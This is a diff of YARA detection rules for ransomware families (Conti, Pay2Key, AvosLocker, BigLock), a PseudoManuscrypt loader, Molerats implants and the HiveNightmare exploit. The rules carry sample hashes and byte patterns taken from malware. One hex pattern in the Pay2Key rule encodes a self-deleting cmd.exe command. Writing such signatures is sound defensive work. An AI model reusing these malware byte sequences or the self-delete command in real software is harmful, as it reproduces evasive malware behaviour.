-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/20-11-19/Yara_Rule_TA505_Nov19.yar#L85-L116"
+		id = "6a3fbb70-034d-5932-8c7f-de8d1b3df25c"
+		date = "2021-06-05"
+		modified = "2021-06-05"
+		reference = "https://twitter.com/fbgwls245/status/1400971422336311297"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-05/BigLock/RAN_BigLock_Jun_2021_1.yara#L1-L18"
 		license_url = "N/A"
-		logic_hash = "84c7f064fb813934e397d81dad8af6288cb919e046cd2bb16f9ca6dc348c43c2"
-		score = 75
+		logic_hash = "f8407f39c4acef3546f8ddc22a04fb0534c5e1fa08d552654d9b9ebdf48fed94"
+		score = 50
 		quality = 75
 		tags = "FILE"
-		hash1 = "270b398b697f10b66828afe8d4f6489a8de48b04a52a029572412ae4d20ff89b"
+		hash1 = "877c612cf42d85b943010437599b828383ecdf02a17e2b017367db34637e5463"
+		level = "Experimental"
+		tlp = "White"
+		adversary = "-"
 
 	strings:
-		$x1 = "C:\\Users\\J\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.MSO\\AFFA0BDC.tmp" fullword wide
-		$x2 = "C:\\Users\\J\\AppData\\Local\\Temp\\AFFA0BDC.tmp" fullword wide
-		$x3 = "C:\\Windows\\system32\\FM20.DLL" fullword ascii
-		$x4 = "C:\\Users\\J\\AppData\\Local\\Temp\\VBE\\MSForms.exd" fullword ascii
-		$x5 = "C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" fullword ascii
-		$x6 = "C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" fullword ascii
-		$x7 = "*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\Windows\\system32\\FM20.DLL#Microsoft Forms 2.0 Object Library" fullword wide
-		$x8 = "*\\G{BA45F137-16B2-487D-9A21-F38179C0576C}#2.0#0#C:\\Users\\J\\AppData\\Local\\Temp\\VBE\\MSForms.exd#Microsoft Forms 2.0 Object" wide
-		$s9 = "*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft " wide
-		$s10 = "lIySgefa86jIfdEkSZVDoSs5BDkcalCieNBN4EqfVaEs2wWD4OjpTiOBqDrL3d9WCaDAKZpoJPRnoacfQPhucmy69axznNmRbRY12v3ez5PdAAnpAl5m5NUqKHBKCYb5" ascii
-		$s11 = "35mvkZ9ZvIttuHSTUKWZCdOsh5j4Y1p2pJ3vi5onOXnMcEPIUIK1UWAYq3noPeaDtAdUOxKYvIlNZbqMpJjqpxhCidfpQ9GJXStKA44w7UFlKV9oMK8f5Tn6tKMKsviw" ascii
-		$s12 = "*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual" wide
-		$s13 = "verkar.dll" fullword ascii
-		$s14 = "intc.dll" fullword ascii
-		$s15 = "YjAygups4wPzNU7lNIGBuFbv6Triw8rxEPLSjrYSKXdUV8QuzbwJvdHshfBvdh66er47iobvTX1FCqI8d6RuKRcBhsLdYCOC1hPEdTllabYHlcZ1FDsgyLuwoCZYM7Fq" ascii
-		$s16 = "MinuetsOs.dll" fullword wide
-		$s17 = "KaBYL8xLRpN7VMzibXEzxh2GetwfB6MY9k3dRCNncC5eiyKNTaTrcoUDi4TrLrkULX7KSvAHjrw4lXxPRSvBmvWUzz5WRwKTskBtBa4xIlhT1ZruGeI36SIqamksANYW" ascii
-		$s18 = "XmhvJDfd16Hxk6eRMKJ7sqYIVneFVN7iUzRF8or7LKNKW9bhf5a7V5OGwIIvyJrm8yMUoITytLvRMoVWm7z1NawYTkjzP5HbtBLxwp3GkLMjJ74iWVjBjzI8cWadyuRy" ascii
-		$s19 = "Sx3mdokmfv27AYhtFublOb5Exec1r1b5LAAbsRHrjLKTWiG4K9dKXbuQBxY9mt4nu7u9ygaWWTcczlRpGhpsXzgKgTI52IfZRxyZWHFD8pXd9sqqOJBedLy4ZT3OHe5n" ascii
-		$s20 = "C:\\Windows\\system32\\stdole2.tlb" fullword ascii
+		$s1 = { 33 d2 33 c9 44 8d 42 07 ff 15 97 20 04 00 4c 89 64 24 60 48 c7 44 24 68 07 00 00 00 66 44 89 64 24 50 41 b8 3f 00 00 00 48 8d 15 7e de 04 00 48 8d 4c 24 50 e8 24 5b ff ff 48 83 7c 24 60 00 0f 84 a0 00 00 00 0f 57 c0 33 c0 0f 11 45 90 0f 11 45 a0 0f 11 45 b0 0f 11 45 c0 0f 11 45 d0 0f 11 45 e0 48 89 45 f0 0f 11 44 24 70 48 89 45 80 48 8d 54 24 50 48 83 7c 24 68 08 48 0f 43 54 24 50 48 8d 44 24 70 48 89 44 24 48 48 8d 45 90 48 89 44 24 40 4c 89 64 24 38 4c 89 64 24 30 c7 44 24 28 00 00 00 08 c7 44 24 20 01 00 00 00 45 33 c9 45 33 c0 33 c9 ff 15 fa 1b 04 00 85 c0 74 26 ba ff ff ff ff 48 8b 4c 24 70 ff 15 b6 1c 04 00 48 8b 4c 24 78 ff 15 9b 1d 04 00 48 8b 4c 24 70 ff 15 90 1d 04 00 48 8b 54 24 68 48 83 fa 08 72 37 48 8d 14 55 02 00 00 00 48 8b 4c 24 50 48 8b c1 48 }
+		$s2 = { e8 4e da 01 00 4c 89 64 24 60 48 c7 44 24 68 07 00 00 00 66 44 89 64 24 50 41 b8 43 00 00 00 48 8d 15 e5 dd 04 00 48 8d 4c 24 50 e8 0b 5a ff ff 48 83 7c 24 60 00 0f 84 a0 00 00 00 0f 57 c0 33 c0 0f 11 45 90 0f 11 45 a0 0f 11 45 b0 0f 11 45 c0 0f 11 45 d0 0f 11 45 e0 48 89 45 f0 0f 11 44 24 70 48 89 45 80 48 8d 54 24 50 48 83 7c 24 68 08 48 0f 43 54 24 50 48 8d 44 24 70 48 89 44 24 48 48 8d 45 90 48 89 44 24 40 4c 89 64 24 38 4c 89 64 24 30 c7 44 24 28 00 00 00 08 c7 44 24 20 01 00 00 00 45 33 c9 45 33 c0 33 c9 ff 15 e1 1a 04 00 85 c0 74 26 ba ff ff ff ff 48 8b 4c 24 70 ff 15 9d 1b 04 00 48 8b 4c 24 78 ff 15 82 1c 04 00 48 8b 4c 24 70 ff 15 77 1c 04 00 48 8b 54 24 68 48 83 fa 08 72 37 48 8d 14 55 02 00 00 00 48 8b 4c 24 50 48 8b c1 48 81 fa 00 10 00 }
+		$s3 = { 45 33 c0 48 2b d0 48 8d 4d c7 e8 ba cf ff ff 0f 10 45 c7 0f 11 45 07 0f 10 4d d7 0f 11 4d 17 4c 89 6d d7 48 c7 45 df 07 00 00 00 66 44 89 6d c7 41 b0 01 48 8d 55 07 e8 bd 0b 00 00 90 48 8b 55 1f 48 83 fa 08 72 37 48 8d 14 55 02 00 00 00 48 8b 4d 07 48 8b c1 48 81 fa 00 10 00 00 72 19 48 83 c2 27 48 8b 49 f8 48 2b c1 48 83 c0 f8 48 83 f8 1f 0f 87 f9 09 00 00 e8 34 b6 01 00 90 ba 08 01 00 00 e8 d1 39 ff ff 4c 8b c0 48 c7 45 d7 04 01 00 00 48 c7 45 df 07 01 00 00 41 0f b7 c5 49 8b f8 b9 04 01 00 00 66 f3 ab 66 45 89 a8 08 02 00 00 4c 89 45 c7 48 8d 55 c7 48 83 7d df 08 49 0f 43 d0 44 8b 45 d7 48 8d 0d 83 c7 04 00 ff 15 7d f8 03 00 8b d0 48 8b 45 d7 48 3b d0 77 19 48 8d 45 c7 48 83 7d df 08 48 0f 43 45 c7 48 89 55 d7 66 44 89 2c }
+		$s4 = { 48 8b c3 48 8b 4d b7 48 2b c1 48 83 f8 15 0f 82 7b 04 00 00 4c 8d 4d a7 48 83 7d bf 08 4c 0f 43 4d a7 48 c7 44 24 30 15 00 00 00 48 8d 05 69 c2 04 00 48 89 44 24 28 48 89 4c 24 20 48 8d 4d 07 e8 86 17 00 00 90 45 33 c0 48 8d 55 07 e8 89 05 00 00 90 4c 8b 45 1f 49 83 f8 08 72 0c 49 ff c0 48 8b 55 }
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and filesize < 5000KB and 1 of ( $x* ) and 4 of them
+		uint16( 0 ) == 0x5a4d and filesize > 100KB and 3 of ( $s* )
 }
-rule ARKBIRD_SOLG_RAN_Conti_Dec_2021_1 : FILE
+rule ARKBIRD_SOLG_Ran_Pay2Key_Nov_2020_1 : FILE
 {
 	meta:
-		description = "Detect Conti ransomware (v3)"
+		description = "Detect Pay2Key ransomware"
 		author = "Arkbird_SOLG"
-		id = "efa65b86-95d7-55fd-b98a-7b3c747a671c"
-		date = "2021-12-16"
-		modified = "2021-12-16"
+		id = "440b8128-4708-54ba-94c3-c0b522004da6"
+		date = "2020-12-01"
+		modified = "2020-12-14"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-12-16/RAN_Conti_Dec_2021_1.yara#L1-L19"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-14/Pay2Key/Ran_Pay2Key_Nov_2020_1.yar#L1-L31"
 		license_url = "N/A"
-		logic_hash = "038ad0c7ffcabcaf85de1adadf8a386063f96d5cd0e348a3cea4ea3b7b10fe70"
+		logic_hash = "f1ea1ed141ba7a1eaaa34c216adebfacaa23ef8776a0216b778ccb34bd000590"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "a05c8129e607c6d0976d79f69c6a020d15767a9ef3a9c9f1570c5193a7b5b76b"
-		hash2 = "3125aa67fc6e09a00aad39e0eb8024b849d54de353b1a45b5297d4c5d5e87941"
-		hash3 = "03597628e999d791f4cc442328024235db9a929467a62ef0a00c91a76161f0e1"
-		tlp = "white"
-		adversary = "RAAS"
+		hash1 = "5bae961fec67565fb88c8bcd3841b7090566d8fc12ccb70436b5269456e55c00"
+		hash2 = "d2b612729d0c106cb5b0434e3d5de1a5dc9d065d276d51a3fb25a08f39e18467"
+		hash3 = "ea7ed9bb14a7bda590cf3ff81c8c37703a028c4fdb4599b6a283d68fdcb2613f"
 
 	strings:
-		$s1 = { 81 ec 78 0b 00 00 c6 45 c4 00 c6 45 c5 48 c6 45 c6 45 c6 45 c7 64 c6 45 c8 45 c6 45 c9 46 c6 45 ca 45 c6 45 cb 46 c6 45 cc 45 53 c6 45 cd 45 bb 7f 00 00 00 c6 45 ce 45 8a 45 c5 80 7d c4 00 56 57 8b f9 75 2c 33 f6 66 0f 1f 44 00 00 8a 44 35 c5 b9 45 00 00 00 0f b6 c0 2b c8 6b c1 1b 99 f7 fb 8d 42 7f 99 f7 fb 88 54 35 c5 46 83 fe 0a 72 dc 8d 45 c5 89 85 88 f4 ff ff c6 45 b8 00 c6 45 b9 65 c6 45 ba 32 c6 45 bb 45 c6 45 bc 32 c6 45 bd 43 c6 45 be 32 c6 45 bf 6d c6 45 c0 32 c6 45 c1 32 c6 45 c2 32 8a 45 b9 80 7d b8 00 75 29 33 f6 8a 44 35 b9 b9 32 00 00 00 0f b6 c0 2b c8 8d 04 49 c1 e0 03 99 f7 fb 8d 42 7f 99 f7 fb 88 54 35 b9 46 83 fe 0a 72 d9 8d 45 b9 89 85 8c f4 ff ff 8d 8d 34 f7 ff ff c6 85 34 f7 ff ff 00 c6 85 35 f7 ff ff 6d c6 85 36 f7 ff ff 11 c6 85 37 f7 ff ff 54 c6 85 38 f7 ff ff 11 c6 85 39 f7 ff ff 58 c6 85 3a f7 ff ff 11 c6 85 3b f7 ff ff 58 c6 85 3c f7 ff ff 11 c6 85 3d f7 ff ff 5a c6 85 3e f7 ff ff 11 c6 85 3f f7 ff ff 56 c6 85 40 f7 ff ff 11 c6 85 41 f7 ff ff 11 c6 85 42 f7 ff ff 11 8a 85 35 f7 ff ff e8 e2 a2 00 00 89 85 90 f4 ff ff c6 85 c4 f8 ff ff 00 c6 85 c5 f8 ff ff 18 c6 85 c6 f8 ff ff 0c c6 85 c7 f8 ff ff 57 c6 85 c8 f8 ff ff 0c c6 85 c9 f8 ff ff 52 c6 85 ca f8 ff ff 0c c6 85 cb f8 ff ff 52 c6 85 cc f8 ff ff 0c c6 85 cd f8 ff ff 10 c6 85 ce f8 ff ff 0c c6 85 cf f8 ff ff 52 c6 85 d0 f8 ff ff 0c c6 85 d1 f8 ff ff 0c c6 85 d2 f8 ff ff 0c 8a 85 c5 f8 ff ff 80 bd c4 f8 ff ff 00 75 2a 33 c9 66 90 8a 84 0d c5 f8 ff ff 0f b6 c0 83 e8 0c 6b c0 19 99 f7 fb 8d 42 7f 99 f7 fb 88 94 0d c5 f8 ff ff 41 83 f9 0e 72 da 8d 85 c5 f8 ff ff 89 85 94 f4 ff ff c6 85 04 f9 ff ff 00 c6 85 05 f9 ff ff 74 c6 85 06 f9 ff ff 4d c6 85 07 f9 ff ff 23 c6 85 08 f9 ff ff 4d c6 85 09 f9 ff ff 72 c6 85 0a f9 ff ff 4d c6 85 0b f9 ff ff 72 c6 85 0c f9 ff ff 4d c6 85 0d f9 ff ff 5a c6 85 0e f9 ff ff 4d c6 85 0f f9 ff ff 42 c6 85 10 f9 ff ff 4d c6 85 11 f9 ff ff 4d c6 85 12 f9 ff ff 4d 8a 85 05 f9 ff ff 80 bd 04 f9 ff ff 00 75 2c 33 c9 0f 1f 40 00 8a 84 0d 05 f9 ff ff 0f b6 c0 83 e8 4d 6b c0 25 99 f7 fb 8d 42 7f 99 f7 fb 88 94 0d 05 f9 ff ff 41 83 f9 0e 72 da 8d 85 05 f9 ff ff 89 85 98 f4 ff ff c6 85 f4 f8 ff ff 00 c6 85 f5 f8 ff ff 46 c6 85 f6 f8 ff ff 02 c6 85 f7 f8 ff ff 2e c6 85 f8 f8 ff ff 02 c6 85 f9 f8 ff ff 3c c6 85 fa f8 ff ff 02 c6 85 fb f8 ff ff 3c c6 85 fc f8 ff ff 02 c6 85 fd f8 ff ff 43 c6 85 fe f8 ff ff 02 c6 85 }
-		$s2 = { c7 85 b8 f7 ff ff 00 00 00 00 8d 8d 60 f7 ff ff c6 85 60 f7 ff ff 00 c6 85 61 f7 ff ff 36 c6 85 62 f7 ff ff 7a c6 85 63 f7 ff ff 29 c6 85 64 f7 ff ff 7a c6 85 65 f7 ff ff 29 c6 85 66 f7 ff ff 7a c6 85 67 f7 ff ff 69 c6 85 68 f7 ff ff 7a c6 85 69 f7 ff ff 37 c6 85 6a f7 ff ff 7a c6 85 6b f7 ff ff 74 c6 85 6c f7 ff ff 7a c6 85 6d f7 ff ff 0f c6 85 6e f7 ff ff 7a c6 85 6f f7 ff ff 75 c6 85 70 f7 ff ff 7a c6 85 71 f7 ff ff 1d c6 85 72 f7 ff ff 7a c6 85 73 f7 ff ff 00 c6 85 74 f7 ff ff 7a c6 85 75 f7 ff ff 7a c6 85 76 f7 ff ff 7a 8a 85 61 f7 ff ff e8 e7 bb 00 00 6a 07 68 8f cf af 70 ba 19 00 00 00 8b f0 e8 04 db ff ff 83 c4 08 56 ff d0 8b 8d b4 f7 ff ff 8d b5 b8 f7 ff ff 56 ff b5 a8 f7 ff ff 8b 11 6a 00 6a 00 6a 00 6a 00 6a 00 50 51 ff 52 0c 8b f0 c7 85 8c f7 ff ff d6 00 6a 00 8b 85 8c f7 ff ff 99 f7 fb 85 d2 74 50 8b 8d 8c f7 ff ff 8b 85 b8 f7 ff ff 83 c0 02 03 c1 89 85 8c f7 ff ff 8b 85 8c f7 ff ff 25 03 00 00 80 79 05 48 83 c8 fc 40 0f 85 50 01 00 00 66 90 ff 85 8c f7 ff }
-		$s3 = { 75 f5 88 8d 50 f6 ff ff c6 85 51 f6 ff ff 48 c6 85 52 f6 ff ff 20 c6 85 53 f6 ff ff 5e c6 85 54 f6 ff ff 20 c6 85 55 f6 ff ff 7d c6 85 56 f6 ff ff 20 c6 85 57 f6 ff ff 39 c6 85 58 f6 ff ff 20 c6 85 59 f6 ff ff 33 c6 85 5a f6 ff ff 20 c6 85 5b f6 ff ff 2a c6 85 5c f6 ff ff 20 c6 85 5d f6 ff ff 33 c6 85 5e f6 ff ff 20 c6 85 5f f6 ff ff 4d c6 85 60 f6 ff ff 20 c6 85 61 f6 ff ff 6e c6 85 62 f6 ff ff 20 c6 85 63 f6 ff ff 48 c6 85 64 f6 ff ff 20 c6 85 65 f6 ff ff 4d c6 85 66 f6 ff ff 20 c6 85 67 f6 ff ff 1b c6 85 68 f6 ff ff 20 c6 85 69 f6 ff ff 3a c6 85 6a f6 ff ff 20 c6 85 6b f6 ff ff 52 c6 85 6c f6 ff ff 20 c6 85 6d f6 ff ff 47 c6 85 6e f6 ff ff 20 c6 85 6f f6 ff ff 09 c6 85 70 f6 ff ff 20 c6 85 71 f6 ff ff 14 c6 85 72 f6 ff ff 20 c6 85 73 f6 ff ff 7d c6 85 74 f6 ff ff 20 c6 85 75 f6 ff ff 49 c6 85 76 f6 ff ff 20 c6 85 77 f6 ff ff 74 c6 85 78 f6 ff ff 20 c6 85 79 f6 ff ff 1f c6 85 7a f6 ff ff 20 c6 85 7b f6 ff ff 52 c6 85 7c f6 ff ff 20 c6 85 7d f6 ff ff 71 c6 85 7e f6 ff ff 20 c6 85 7f f6 ff ff 5f c6 85 80 f6 ff ff 20 c6 85 81 f6 ff ff 1f c6 85 82 f6 ff ff 20 c6 85 83 f6 ff ff 54 c6 85 84 f6 ff ff 20 c6 85 85 f6 ff ff 33 c6 85 86 f6 ff ff 20 c6 85 87 f6 ff ff 5e c6 85 88 f6 ff ff 20 c6 85 89 f6 ff ff 44 c6 85 8a f6 ff ff 20 c6 85 8b f6 ff ff 0f c6 85 8c f6 ff ff 20 c6 85 8d f6 ff ff 52 c6 85 8e f6 ff ff 20 c6 85 8f f6 ff ff 74 c6 85 90 f6 ff ff 20 c6 85 91 f6 ff ff 13 c6 85 92 f6 ff ff 20 c6 85 93 f6 ff ff 33 c6 85 94 f6 ff ff 20 c6 85 95 f6 ff ff 5e c6 85 96 f6 ff ff 20 c6 85 97 f6 ff ff 52 c6 85 98 f6 ff ff 20 c6 85 99 f6 ff ff 47 c6 85 9a f6 ff ff 20 c6 85 9b f6 ff ff 31 c6 85 9c f6 ff ff 20 c6 85 9d f6 ff ff 5b c6 85 9e f6 ff ff 20 c6 85 9f f6 ff ff 1b c6 85 a0 f6 ff ff 20 c6 85 a1 f6 ff ff 39 c6 85 a2 f6 ff ff 20 c6 85 a3 f6 ff ff 33 c6 85 a4 f6 ff ff 20 c6 85 a5 f6 ff ff 2a c6 85 a6 f6 ff ff 20 c6 85 a7 f6 ff ff 33 c6 85 a8 f6 ff ff 20 c6 85 a9 f6 ff ff 4d c6 85 aa f6 ff ff 20 c6 85 ab f6 ff ff 1f c6 }
+		$s1 = "F:\\2-Sources\\21-FinalCobalt\\Source\\cobalt\\Cobalt\\Cobalt\\Win32\\Release\\Client\\Cobalt.Client.pdb" fullword ascii
+		$s2 = ".\\Cobalt-Client-log.txt" fullword ascii
+		$s3 = ".\\Config.ini" fullword wide
+		$s4 = "Local\\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag" fullword ascii
+		$s5 = "\\Microsoft\\Windows\\Themes\\TranscodedWallpaper" fullword ascii
+		$s6 = { 40 00 63 00 6d 00 64 00 2e 00 65 00 78 00 65 00 20 00 2f 00 43 00 20 00 70 00 69 00 6e 00 67 00 20 00 31 00 2e 00 31 00 2e 00 31 00 2e 00 31 00 20 00 2d 00 6e 00 20 00 31 00 20 00 2d 00 77 00 20 00 33 00 30 00 30 00 30 00 20 00 3e 00 20 00 4e 00 75 00 6c 00 20 00 26 00 20 00 44 00 65 00 6c 00 20 00 2f 00 66 00 20 00 2f 00 71 00 20 00 22 00 25 00 73 00 22 }
+		$s7 = "%WINDRIVE%" fullword wide
+		$s8 = "%WINDIR%" fullword wide
+		$dbg1 = "message.txt" fullword ascii
+		$dbg2 = "Failed To Get Data...." fullword ascii
+		$dbg3 = "lock.locked()" fullword wide
+		$dbg4 = { 47 65 74 41 64 61 70 74 65 72 73 49 6e 66 6f 20 66 61 69 6c 65 64 20 77 69 74 68 20 65 72 72 6f 72 3a 20 25 64 0a }
+		$dbg5 = { 43 72 79 70 74 41 63 71 75 69 72 65 43 6f 6e 74 65 78 74 20 66 61 69 6c 65 64 3a 20 25 78 0a }
+		$dbg6 = { 43 72 79 70 74 44 65 72 69 76 65 4b 65 79 20 66 61 69 6c 65 64 3a 20 25 78 0a 00 00 25 00 64 }
+		$dbg7 = { 5b 2d 5d 20 43 72 79 70 74 45 6e 63 72 79 70 74 20 66 61 69 6c 65 64 0a }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 100KB and all of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 500KB and ( 5 of ( $s* ) and 4 of ( $dbg* ) )
 }
-rule ARKBIRD_SOLG_MAL_Pseudomanuscrypt_Dec_2021_1 : FILE
+rule ARKBIRD_SOLG_RAN_Avoslocker_July_2021_1 : FILE
 {
 	meta:
-		description = "Detect PseudoManuscrypt loader dropped by the installer"
+		description = "Detect AvosLocker ransomware"
 		author = "Arkbird_SOLG"
-		id = "8784baa0-c52c-5ee0-9a92-9b6457df61ed"
-		date = "2021-12-16"
-		modified = "2021-12-17"
-		reference = "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-PseudoManuscrypt-a-mass-scale-spyware-attack-campaign-En.pdf"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-12-16/MAL_PseudoManuscrypt_Dec_2021_1.yara#L1-L22"
+		id = "3fbc707f-9802-54bc-933b-bc4c4953b1d0"
+		date = "2021-07-23"
+		modified = "2021-07-24"
+		reference = "https://blog.malwarebytes.com/threat-analysis/2021/07/avoslocker-enters-the-ransomware-scene-asks-for-partners/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/20.21-07-23/AvosLocker/RAN_AvosLocker_July_2021_1.yara#L1-L23"
 		license_url = "N/A"
-		logic_hash = "e304323ed26c7040c97efa8041bcd3eb2f6d0caeba76d6674fc2947d7850e830"
+		logic_hash = "e2291f574b5ab68e901a76b6511e0ee4c1eee51d5e3eced62bf68ceedb061958"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "19627bcee38a4ca5ae9a60c71ee7a2e388ba99fb8b229700a964a084db236e1f"
-		hash2 = "be94df270acfc8e5470fa161b808d0de1c9e85efeeff4a5d82f5fd09629afa8e"
-		hash3 = "de965e33dff58cf011106feacef2f804d9e35d00b8b5ff7064e5b7afee46d72c"
-		hash4 = "e32899bef78f6af4a155f738298e042f72fe5e643ec934f8778180f71e511727"
+		hash1 = "43b7a60c0ef8b4af001f45a0c57410b7374b1d75a6811e0dfc86e4d60f503856"
+		hash2 = "fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f"
 		tlp = "white"
 		adversary = "-"
 
 	strings:
-		$s1 = { 53 4f 46 54 57 41 52 45 5c 4d 69 63 72 6f 73 6f 66 74 5c 43 72 79 70 74 6f 67 72 61 70 68 79 00 7b 47 36 35 37 59 53 30 36 2d 30 31 36 44 2d 34 43 30 52 2d 36 30 32 32 2d 46 47 45 32 43 33 32 32 36 36 37 46 7d 00 00 4d 61 63 68 69 6e 65 47 75 69 64 }
-		$s2 = { 45 ?? 5c 43 4c 53 c7 45 ?? 49 44 5c 25 c7 45 ?? 73 00 00 00 c7 45 ?? 47 6c 6f 62 c7 45 ?? 61 6c }
-		$s3 = { 56 69 72 74 c7 [2-4] 75 61 6c 41 c7 [2-4] 6c 6c 6f 63 ff 15 }
-		$s4 = { 4c 6f 61 64 65 72 2e 64 6c 6c 00 53 65 72 76 69 63 65 4d 61 69 6e }
-		$s5 = { 2e 72 73 72 63 24 30 31 00 00 00 00 a0 ?? 00 00 ?? 04 00 00 2e 72 73 72 63 24 30 32 }
+		$s1 = { 64 72 69 76 65 20 25 73 20 74 6f 6f 6b 20 25 66 20 73 65 63 6f 6e 64 73 0a 00 00 00 25 63 3a 00 64 72 69 76 65 3a 20 25 73 }
+		$s2 = { 63 6c 69 65 6e 74 5f 72 73 61 5f 70 72 69 76 3a 20 25 73 0a }
+		$s3 = { 2d 2d 2d 2d 2d 42 45 47 49 4e 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 2d 2d 2d 2d 2d 45 4e 44 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d }
+		$s4 = { ff 35 b8 2c 46 00 88 9d 7c ef ff ff e8 3c 56 02 00 50 8d 85 71 ef ff ff 50 e8 c5 9e ff ff 83 c4 0c 8d 85 94 ef ff ff 50 53 53 68 14 01 00 00 ff 35 b8 2c 46 00 ff b5 90 ef ff ff ff 15 00 a0 44 00 85 c0 0f 85 cd 00 00 00 8b 35 48 a0 44 00 8d 85 98 fe ff ff 53 68 ff 00 00 00 50 68 00 04 00 00 ff d6 50 53 68 00 10 00 00 ff 15 44 a0 44 00 b1 3e c7 85 70 ef ff ff 3e 7b 6c 6c c7 85 74 ef ff ff 71 6c 04 1e 8b c3 c7 85 78 ef ff ff 1b 4d 34 00 30 8c 05 71 ef ff ff 40 83 f8 0a 73 08 8a 8d 70 ef ff ff eb eb 8d 85 98 fe ff ff 88 9d 7b ef ff ff 50 8d 85 71 ef ff ff 50 e8 23 9e ff ff 0f 28 05 00 8b 45 00 59 0f 11 85 48 ef ff ff 59 0f 28 05 40 8b 45 00 8b cb 0f 11 85 58 ef ff ff 66 c7 }
+		$s5 = { 38 9d a0 fd ff ff 74 0c ff b5 94 fd ff ff e8 a6 ca ff ff 59 8d 85 ac fd ff ff 50 56 ff 15 48 a1 44 00 85 c0 0f 85 4d ff ff ff 8b 85 a4 fd ff ff 8b 8d 84 fd ff ff 8b 10 8b 40 04 2b c2 c1 f8 02 3b }
+		$s6 = { 4d 61 70 3a 20 25 73 0a 00 00 00 00 65 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6e 00 67 00 20 00 25 00 6c 00 73 00 20 00 66 00 61 00 69 00 6c 00 65 00 64 }
+		$s7 = { 44 6f 6e 65 21 21 0a 00 25 66 20 73 65 63 6f 6e 64 73 0a }
+		$s8 = { 56 68 01 00 00 08 6a 01 52 ff 15 14 a0 44 00 85 c0 0f 84 97 00 00 00 8d 45 f8 50 53 53 6a 06 53 ff 36 8b 1d 20 a0 44 00 ff d3 85 c0 74 73 ff 75 f8 e8 3b a7 01 00 a3 b8 2c 46 00 59 85 c0 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 3KB and filesize < 30KB and all of ( $s* )
+		uint16( 0 ) == 0x5A4D and filesize > 50KB and 6 of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_Molerats_Feb_2021_1 : FILE
+rule ARKBIRD_SOLG_Exp_CVE_2021_36934_July_2021_1 : FILE
 {
 	meta:
-		description = "Detect Molerats implants"
+		description = "Detect CVE_2021_36934 exploit (HiveNightmare)"
 		author = "Arkbird_SOLG"
-		id = "8ede3aa9-9788-52a5-91a7-bb160daad5ba"
-		date = "2021-02-27"
-		modified = "2021-03-01"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-02-28/Molerats/APT_Molerats_Feb_2021_1.yar#L1-L23"
+		id = "3a0ed4f7-8a99-569f-a636-4cd64c2121bb"
+		date = "2021-07-23"
+		modified = "2021-07-23"
+		reference = "https://github.com/GossiTheDog/HiveNightmare"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/20.21-07-23/HiveNightmare/Exp_CVE_2021_36934_July_2021_1.yara#L1-L23"
 		license_url = "N/A"
-		logic_hash = "fbd98f088019434f736107dfe62a307e2c57d0288d68f3133a13de59bf318aea"
+		logic_hash = "2fd6cdf8a81f239473716d2c10a1754ebb2c60099eebd9d0cc1450ad3441075b"
 		score = 75
-		quality = 75
+		quality = 48
 		tags = "FILE"
-		hash1 = "0a55551ade55705d4be6e946ab58a26d7cf8087558894af8799931b09d38f3bc"
-		hash2 = "c9d7b5d06cd8ab1a01bf0c5bf41ef2a388e41b4c66b1728494f86ed255a95d48"
+		hash1 = "0009d4950559b508353b951a314c5ac0aaae8161751017d3d4681dc805374eaa"
+		hash2 = "7baab69f86b50199456c9208624dd16aeb0d18d8a6f2010ee6501a183476f12f"
+		hash3 = "9035f88894a937892c63ac9a3c6c16301c7ecea7c11cf31d0fd24c39f17c8c2f"
+		tlp = "white"
+		adversary = "-"
 
 	strings:
